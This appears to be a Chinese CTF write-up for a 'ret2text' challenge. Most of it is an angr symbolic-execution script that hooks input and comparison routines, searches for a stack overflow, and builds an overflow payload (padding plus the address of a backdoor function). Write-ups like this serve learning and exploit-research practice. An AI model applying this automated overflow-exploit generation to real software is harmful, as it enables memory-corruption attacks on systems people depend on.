CheckIn_ret2text

符号执行部分

受限于对 angr 的理解以及不是很清楚一些高级接口,只能手糊一个 hook + state 携带输入字符串符号执行过程

因为代码写的比较杂凑
为理解以下代码需要知道 state.memory 中 0x0 第一个字节存着多少次输入。0x100偏移之后每个0x100存储一个结构 { type:1bytes ,size:1bytes , str:size } 只能说是对症下药了。为了找到栈溢出,需要存储上一次输入字符串可以的长度,我保存在 input_str_off= 0x100000 。我的命名多少有点古怪,明明是个 size ,我把它命名成了 str_off …

要是有什么更好的写法,一定要告诉我呀~

2022/3/7 补充 hook 的写法可以写的简洁一些。这道题可以直接执行,不需要自己去控制程序流或者分析。找到非约束的状态直接求解输入即可。

import claripy
import angr
from angr import SimProcedure
import IPython
import archinfo
import copy

base =  0x400000
start = 0x4013ED
out_off = 0
out_size = 0

symbol_num = 0
input_offset = 0x100
input_str_off= 0x100000
class hook_input_val(SimProcedure):
    def __init__(self):
        SimProcedure.__init__(self)
    def run(self):
        global symbol_num
        st = self.state
        new_symbol  = claripy.BVS("input_%i" %symbol_num, 32)
        st.regs.rax = 0
        st.regs.eax = new_symbol

        symbol_size = st.memory.load(0x0, 0x1, endness=archinfo.Endness.LE) # load size
        before_size  = st.solver.eval(symbol_size)
        after_size  = before_size + 1
        st.memory.store(0x0, after_size, size=1, endness=archinfo.Endness.LE)
        st.memory.store(input_offset+0x100*before_size, 0, size=1, endness=archinfo.Endness.LE)      # type
        st.memory.store(input_offset+0x100*before_size + 1, 4, size=1, endness=archinfo.Endness.LE)  # size
        st.memory.store(input_offset+0x100*before_size + 2, new_symbol, size=4, endness=archinfo.Endness.LE) # value
        # st.memory.store(input_offset+0x100*before_size + 1, 0x20, size= 1, endness=archinfo.Endness.LE)

        symbol_num += 1
        self.jump(st.stack_pop())

# 0x401272
class hook_input_line(SimProcedure):
    def __init__(self):
        SimProcedure.__init__(self)
    def run(self):
        global symbol_num
        st   = self.state
        size = st.solver.eval(st.regs.esi)
        pt   = st.regs.rdi

        symbol_size = st.memory.load(0x0, 0x1, endness=archinfo.Endness.LE)
        before_size = st.solver.eval(symbol_size)
        after_size  = before_size + 1
        
        good_input  = [claripy.BVS("input_%d" %i, 8) for i in range(symbol_num,symbol_num+size)]
        input_bytes = claripy.Concat(*good_input)
        st.memory.store(0x0, after_size, size=1, endness=archinfo.Endness.LE)

        st.memory.store(input_offset+0x100*before_size, 1, size=1, endness=archinfo.Endness.LE)
        st.memory.store(input_offset+0x100*before_size + 1, size, size=1, endness=archinfo.Endness.LE)
        st.memory.store(input_offset+0x100*before_size + 2, input_bytes, size=size, endness=archinfo.Endness.BE)

        st.memory.store(pt, input_bytes, size=size, endness=archinfo.Endness.BE)
        st.memory.store(input_str_off, size, size=4, endness=archinfo.Endness.LE)


        symbol_num += size
        self.jump(st.stack_pop())

# 0x4012CE
class hook_strcmp(SimProcedure):
    def __init__(self):
        SimProcedure.__init__(self)
    def run(self):
        self.jump(self.state.stack_pop())


# 0x4010C0
class hook_printf(SimProcedure):
    def __init__(self):
        SimProcedure.__init__(self)
    def run(self):
        self.jump(self.state.stack_pop())

def main():
    p = angr.Project("./binary",load_options={'main_opts':{'auto_load_libs':True,'base_addr':base,},})
    p.hook(0x401272,hook_input_line())
    p.hook(0x401216,hook_input_val())
    p.hook(0x4010C0,hook_printf())
    p.hook(0x4012CE,hook_strcmp())
    
    
    st = p.factory.blank_state(addr = start)
    st.memory.store(0,0,size=1)

    st.regs.rsp = 0x8000000
    st.regs.rbp = 0x7000000
    st.regs.rbx = 0x0
    
    sm = p.factory.simulation_manager(st)
    sts = [st]

    addr_of_strcpy     = 0x4012CE
    addr_of_input_line = 0x401272
    back_door          = 0x401351
    all_blocks = []
    may_has_overflow_block = []
    may_has_overflow_block_addr = []
    has_overflow = []

    while (sts):
        st = sts[0]
        sts.remove(st)
        sucs = st.step().successors

        if (sucs):
            cap = sucs[0].block().capstone
            if(cap.insns[0].mnemonic == 'mov' and cap.insns[0].op_str == 'eax, 0' and cap.insns[1].mnemonic == 'jmp'):
                sucs.clear()
        
        if (sucs and sucs[0].addr == 0x4012ce):
            sucs.append(copy.deepcopy(sucs[0]))
            st1 = sucs[0]
            st2 = sucs[1]

            st1.regs.rax = 0 # 相等
            str_size = st1.solver.eval(st1.memory.load(input_str_off, 4, endness=archinfo.Endness.LE)) # 取出 size
            st1_pt1 = st1.regs.rsi
            st1_pt2 = st1.regs.rdi
            #LOG# print("LOAD string size: ",str_size)
            st1_str1 = st1.memory.load(st1_pt1, str_size, endness=archinfo.Endness.BE)
            st1_str2 = st1.memory.load(st1_pt2, str_size, endness=archinfo.Endness.BE)

            st1.add_constraints(st1_str1 == st1_str2)

            st2.regs.rax = 1 # 不等
            st2_pt1 = st2.regs.rsi
            st2_pt2 = st2.regs.rdi
            st2_str1 = st2.memory.load(st1_pt1, str_size, endness=archinfo.Endness.BE)
            st2_str2 = st2.memory.load(st1_pt2, str_size, endness=archinfo.Endness.BE)
            st2.add_constraints(st2_str1 != st2_str2)
        
        for i in sucs:
            if i not in all_blocks:
                all_blocks.append(i)
            if i.addr == 0x401272 and st.addr not in may_has_overflow_block_addr:
                print("LOG: FIND ONE MAY OVERFLOW ", hex(st.addr))
                size = i.solver.eval(i.memory.load(input_str_off, 4, endness=archinfo.Endness.LE)) # 取出 size
                all_ins = st.block().capstone.insns
                if all_ins[0].mnemonic == 'lea':
                    op_str = all_ins[0].op_str
                    find_0x= op_str.find('0x')
                    off = int(op_str[find_0x:-1] ,base = 16)
                    if size > off:
                        global out_off
                        global out_size
                        out_off = off
                        out_size = size
                        has_overflow.append(st)
                        sts.clear()
                        break
            sts.append(i)

    result = b''
    if (has_overflow):
        res_st = has_overflow[0]
        symbol_size = res_st.memory.load(0x0, 0x1, endness=archinfo.Endness.LE)
        size = res_st.solver.eval(symbol_size)
        for i in range(size):
            my_type = res_st.solver.eval(res_st.memory.load(input_offset + 0x100 * i, 1, endness=archinfo.Endness.LE))
            my_size = res_st.solver.eval(res_st.memory.load(input_offset + 0x100 * i + 1, 1, endness=archinfo.Endness.LE))
            if (my_type == 0):
                tmp_str = str(res_st.solver.eval(res_st.memory.load(input_offset + 0x100 * i + 2, my_size, endness=archinfo.Endness.LE))).encode('utf-8')
                result += tmp_str + b' '
            elif (my_type == 1):
                result += res_st.solver.eval(res_st.memory.load(input_offset + 0x100 * i + 2, my_size, endness=archinfo.Endness.BE), cast_to=bytes)
        result += ((0x28)*b'a'+p64(back_door))
        print(result)
        
if __name__ == "__main__":
    main()